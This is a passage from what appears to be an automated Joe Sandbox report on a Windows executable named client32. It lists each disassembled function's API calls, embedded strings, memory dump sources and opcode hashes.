                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProfileString_memmove
                                                                                        • String ID: ,,LPT1:$Device$Windows
                                                                                        • API String ID: 1665476579-2967085602
                                                                                        • Opcode ID: 84c6e57cbd8fc4f7538afa223db3259dff3af144902b2b86f036842710f49a9f
                                                                                        • Instruction ID: 055e85ea75ba770a70e20350d0a84ef6a9c3bf4bb9e235a47bfd0f5fb1665b7d
                                                                                        • Opcode Fuzzy Hash: 84c6e57cbd8fc4f7538afa223db3259dff3af144902b2b86f036842710f49a9f
                                                                                        • Instruction Fuzzy Hash: E0113B39918267AADB119F70ED41BF9FB68EF55708F1000A8DD8597242FB326609C7B2
                                                                                        APIs
                                                                                        • GetMenu.USER32(?,750A7EED,750A7D59,00000000,?,?,?,110BD942,750A7EED,?), ref: 110BD4A4
                                                                                        • GetSubMenu.USER32(00000000,00000002,?,?,?,?,110BD942,750A7EED,?), ref: 110BD4E5
                                                                                        • DrawMenuBar.USER32(?,00000000,000034BD,110BD942,00000000,?,?,?,?,110BD942,750A7EED,?), ref: 110BD50D
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BD48E
                                                                                        • m_hWnd, xrefs: 110BD493
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 381722633-2830328467
                                                                                        • Opcode ID: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                        • Instruction ID: 2ed85e2a360b3d02c99ae53d45e4f65cdbccb9b7267b746ab424cefae630bdcb
                                                                                        • Opcode Fuzzy Hash: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                        • Instruction Fuzzy Hash: 9B1151BAE00219AFCB04DFA5C894CAFF7B9BF49308B00457EE11697254DB74AD05CB94
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(?,1113A2AB,00000001,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102D75C
                                                                                        • InterlockedIncrement.KERNEL32(111EE418,Audio,HookDirectSound,00000000,00000000), ref: 1102D799
                                                                                        • InterlockedDecrement.KERNEL32(111EE418,Audio,HookDirectSound,00000000,00000000), ref: 1102D7C0
                                                                                        Strings
                                                                                        • EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102D77F
                                                                                        • SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102D7A6, 1102D7CC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Interlocked$DecrementIncrementVersion
                                                                                        • String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
                                                                                        • API String ID: 1284810544-229394064
                                                                                        • Opcode ID: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                        • Instruction ID: 926408d456050aac1ce0bfa7cc5ec849c80561d93592d3bffa921dc6a50aec96
                                                                                        • Opcode Fuzzy Hash: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                        • Instruction Fuzzy Hash: 8801DB3AE425A956E70299D56C84F9DB7E9BF8162DFC00071FD2DD2A04F725A84043F1
                                                                                        APIs
                                                                                        • GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                        • LoadIconA.USER32(1109350C,00002716), ref: 11093456
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 11093465
                                                                                        • RegisterClassA.USER32(?), ref: 11093483
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ClassLoad$CursorIconInfoRegister
                                                                                        • String ID: NSMClassList
                                                                                        • API String ID: 2883182437-2474587545
                                                                                        • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                        • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                                        • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                        • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LoadStringwsprintf
                                                                                        • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                        • API String ID: 104907563-3240211118
                                                                                        • Opcode ID: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                        • Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
                                                                                        • Opcode Fuzzy Hash: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                        • Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11145463
                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage,?,11037F05), ref: 11145475
                                                                                        • FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                        • API String ID: 145871493-545709139
                                                                                        • Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                        • Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
                                                                                        • Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                        • Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765
                                                                                        APIs
                                                                                        • GetMenu.USER32(00000000,750A7D59,?,110BDC96,?,00000000,?,110BFF9C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110BDBA5
                                                                                        • GetSubMenu.USER32(00000000,00000002,?,110BDC96,?,00000000,?,110BFF9C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110BDBBD
                                                                                        • DrawMenuBar.USER32(00000000,?,110BDC96,?,00000000,?,110BFF9C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110BDBD1
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BDB8F
                                                                                        • m_hWnd, xrefs: 110BDB94
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 381722633-2830328467
                                                                                        • Opcode ID: 7793b4124eab6fba1871c3bc9272eb7fe89a90c363d1f3ab0ff0b90efc26d385
                                                                                        • Instruction ID: 3e24fc11817a54fd320548bffb7fb36e34be41f0dee8520d909056115beef515
                                                                                        • Opcode Fuzzy Hash: 7793b4124eab6fba1871c3bc9272eb7fe89a90c363d1f3ab0ff0b90efc26d385
                                                                                        • Instruction Fuzzy Hash: 34F02779A10324ABC724DB309C49F5EB2E4AB4871CF00083DF122A2580DB74A4048359
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                                        • SendMessageA.USER32(00000000,0000045B,11020C43,00000000,?,11020C43,00000000,00000001), ref: 110ED10D
                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04000000,?,11020C43,00000000,00000001), ref: 110ED11C
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                                        • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                        • API String ID: 2446111109-1196874063
                                                                                        • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                        • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                                        • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                        • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                                        APIs
                                                                                        • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                                        • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                                        • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AtomDeleteGlobal$LongWindow
                                                                                        • String ID: qu
                                                                                        • API String ID: 964255742-2766958120
                                                                                        • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                        • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                                        • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                        • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                                        APIs
                                                                                        • FindWindowA.USER32 ref: 11017428
                                                                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
                                                                                        • PostMessageA.USER32 ref: 11017458
                                                                                        • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessageWindow$FindLongPostSend
                                                                                        • String ID: IPTip_Main_Window
                                                                                        • API String ID: 3445528842-293399287
                                                                                        • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                        • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                                        • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                        • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?,B24479DC), ref: 11069909
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 110699DC
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 11069A07
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Leave$Enter__wcstoi64
                                                                                        • String ID: Buffers$Client
                                                                                        • API String ID: 1723449611-673521604
                                                                                        • Opcode ID: 47014f8817006754412782fa05321fcc3cdc61410f013134229025b7891f35c6
                                                                                        • Instruction ID: 6e52f73104c3b5384aab9ec7da9b21e4f26a08b532b87f3f1e7b4992386e0f41
                                                                                        • Opcode Fuzzy Hash: 47014f8817006754412782fa05321fcc3cdc61410f013134229025b7891f35c6
                                                                                        • Instruction Fuzzy Hash: E1415A75A04209AFDB14CFA8C880B9EF7F9EF88704F20855DE515DB785DB75A901CB90
                                                                                        APIs
